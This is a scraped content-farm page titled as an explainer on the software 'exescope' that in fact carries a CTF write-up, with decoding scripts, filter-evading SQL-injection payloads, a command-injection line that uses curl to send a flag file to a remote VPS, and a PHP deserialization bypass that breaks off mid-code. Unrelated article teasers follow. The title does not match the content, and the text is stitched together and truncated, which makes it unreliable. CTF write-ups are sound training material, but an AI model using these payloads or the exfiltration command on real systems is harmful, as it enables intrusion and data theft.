exescope(exescope是什么软件)

最近有很多读者朋友对exescope有疑问。由部分网友整理出相关内容希望能够解答你的疑惑,关于exescope是什么软件,本站也已经为你找到了问题的答案,希望能帮助到你。

exescope(exescope是什么软件)

作者:08067

预估稿费:300RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

比赛地址:ctf.08067.me

misc 100-1

http://misc.08067.me/misc4

misc 100-1 很简单,就是jsfuck和brianfuck两次编码,直接解出即可。

exescope(exescope是什么软件)

exescope(exescope是什么软件)

Misc 100-2

http://misc.08067.me/misc3/

Misc 100-2题目给的是一个图片,用winhex打开看到底部的密文

exescope(exescope是什么软件)

Base32解密得到:vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}

发现是凯撒加密,不过奇偶数移位方向不一样,发现偏移量是16,用脚本跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
str = "vbkq{ukCkS_vrduztucCVQXVuvzuckrvtZDUBTGYSkvcktv}"
for i in range(26):
key = ''
for x in str:
s = ord(x)
if (s not in range(97,123)) and (s not in range(65,91)):
key = key + chr(s)
else:
#print chr(s)
if s in range(97,123):
if s % 2 == 0:
s = s - i
if s not in range(97,123):
t = 97-s
t = 123-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(97,123):
t = s-122+96
key = key + chr(t)
else:
key = key + chr(s)
else:
#print chr(s)
if s % 2 == 0:
s = s - i
if s not in range(65,91):
t = 65-s
t = 91-t
key = key + chr(t)
else:
key = key + chr(s)
else:
s = s + i
if s not in range(65,91):
t = s-90+64
key = key + chr(t)
else:
key = key + chr(s)
print key

Misc 150

http://misc.08067.me/misc2/

打开wireshark数据包,提取http数据,得到一个flag.zip,

exescope(exescope是什么软件)

解压得到一个ce.txt文件,打开发现是一个rgb图片的像素点,然后用脚本还原即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image
import re
if __name__ == '__main__':
x = 887
y = 111
i = 0
j = 0
c = Image.new("RGB", (x,y))
file_object = open('ce.txt')
for i in range(0, x):
for j in range(0, y):
line = file_object.next()
lst = line.split(",")
c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))
c.show()
c.save("c.png")

web 200-1

http://web1.08067.me/

注入,过滤了空格、#、*、union、like、regexp、and、or、|、–、&、%0a、%0b、%0c、%0d等,需要想办法用其他操作符连接注入语句和闭合’。

mysql操作符参考:http://blog.csdn.net/yuzongtao/article/details/45044963

几个可用的poc:

1
uname='!=!!(ascii(mid((passwd)from(1)))=99)!=!!'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)%'1&passwd=dddd
1
uname=12'%(ascii(mid((passwd)from(1)))=99)^'1&passwd=dddd
1
uname=12'-(length(trim(leading%a0'c12'%a0from%a0passwd))<32)-'0&passwd=1

来到后台,可以执行命令,但是对反弹shell的一些关键字做了过滤,对空格也做了过滤,只能通过cat读取flag,没又回显,然后打到用远程vps的日志上面

exp:

curl$IFS\vps:1234/`cat$IFS\../../flag`

exescope(exescope是什么软件)

exescope(exescope是什么软件)

web 200-2

http://web3.08067.me/

这道题主要是考察了php底层 wakeup 的一个bug,https://bugs.php.net/bug.php?id=72663

这道题根据tips:编辑器,可以考虑到.bak文件泄露

通过 robots.txt 发现了 function.php commom.php ,

最后找到了 function.php.bak index.php.bak

我们就获得了 整道题的代码

Index.php.bak

exescope(exescope是什么软件)

我们可以看见了这里 通过 cookie 的登陆

/function.php.bak

exescope(exescope是什么软件)

其他过滤代码 在该文件都可以得到

addslashes_deep() 是无法绕过的,我们就只能绕过wakeup

根据那个bug 的描述,我们直接进入 __destruct() ,这里我们取出了 $this->name

$this->name 是base64decode后,然后反序列化得到的,不用考虑waf等东西

我们看了这里只有一个 Checksql($sql)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
//sql 过滤
static function CheckSql($db_string,$querytype='select')
{
$clean='';
$error='';
$old_pos=0;
$pos=-1;
if($querytype=='select')
{
$notallow1="[^0-9a-z@\._-]{1,}(load_file|outfile)[^0-9a-z@\.-]{1,}";
if(preg_match("/".$notallow1."/i", $db_string))
{
exit("Error");
}
}
//完整的SQL检查
while (TRUE)
{
$pos=strpos($db_string, '\'', $pos + 1);
if ($pos===FALSE)
{
break;
}
$clean .=substr($db_string, $old_pos, $pos - $old_pos);
while (TRUE)
{
$pos1=strpos($db_string, '\'', $pos + 1);
$pos2=strpos($db_string, '\\', $pos + 1);
if ($pos1===FALSE)
{
break;
}
elseif ($pos2==FALSE || $pos2 > $pos1)
{
$pos=$pos1;
break;
}
$pos=$pos2 + 1;
}
$clean .='$s

主题测试文章,只做测试使用。发布者:艾迪号,转转请注明出处:https://www.cqaedi.cn/baike/19542.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年 12月 13日 上午4:53
下一篇 2022年 12月 13日 上午6:05

相关推荐

  • nba总决赛几场(nba总决赛几场几胜制)

    最近很多读者朋友对NBA总决赛的几场比赛都有疑问。有网友整理了相关内容,希望能回答你的疑惑。这个网站已经为你找到了NBA总决赛几胜制问题的答案,希望对你有所帮助。 北京时间6月11日消息,NBA总决赛到了G4.经过激烈的竞争,凯尔特人主场以97-107输给勇士,错过了3-1的赛点。在此基础上,NBA总决赛G五赛程公布后,勇士队有望率先夺得赛点,具体细节如下:…

    百科大全 2023年 1月 19日
    1800
  • 十大进口痛风药排名()

    最近,许多读者对十大进口痛风药的排名有疑问。有网友整理了相关内容,希望能回答你的疑惑。关于,这个网站已经为你找到了问题的答案,希望对你有所帮助。 据说外国的月亮相对较远。在痛风患者的印象中,外国药物通常比国内药物更有效,尤其是一些民间处方药物。假如你经常关注朋友圈里各种药贩子的动态。你会发现有一种药叫泰国娜莎,最近很流行。那么这种药的真相是什么呢?恐怕在你知…

    百科大全 2023年 2月 24日
    1900
  • 巴图是宋丹丹亲生的吗(巴图是宋丹丹和谁生的)

    巴图不被亲生父亲认可,与宋丹丹相依为命,如今结果连生两子,在巴图很小的时候,父亲英达就跟母亲宋丹丹离婚了,之后一直都跟着母亲生活,长大之后在宋丹丹的帮助下,也进入到了演艺圈,出演了很多影视剧,发展的也很好,可作为亲生父亲的英达,不但没帮忙,还一直都没有认可巴图,父子俩到今天都没有相认, 跟妈妈相依为命几十年的巴图,最终也结婚了,娶了大自己7岁的女演员王博谷,…

    2022年 12月 5日
    6900
  • 小白点苹果怎么设置出来(平板小白点苹果怎么设置出来)

    最近有很多读者朋友对如何设置小白点苹果有疑问。有网友整理了相关内容,希望能回答你的疑惑。关于如何设置平板小白点苹果,这个网站已经为你找到了问题的答案,希望对你有所帮助。 你最站在苹果手机的OLED屏幕和LCD屏幕上哪一个?自iPhone 11系列之后,OLED屏幕逐渐进入大众视野,不仅提升了色彩视觉,还让眼睛长时间疲惫甚至不舒服。今天,机叔将与大家分享iPh…

    百科大全 2023年 3月 24日
    700
  • 华硕笔记本进入bios按哪个键(华硕笔记本进入bios按哪个键u盘启动)

    最近有很多读者朋友对华硕笔记本进入bios按哪个键有疑问。有网友整理了相关内容,希望能回答你的疑惑。关于华硕笔记本进入bios,按哪个键u盘启动,这个网站已经为你找到了问题的答案,希望对你有所帮助。 许多童鞋在安装黑苹果时会卡住,主要是因为cfg lock 未关闭,USB端口或SATA模式设置错误。 为了避免这些安装阶段的错误报告,今天我将与大家分享超详细的…

    百科大全 2023年 2月 25日
    1800

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信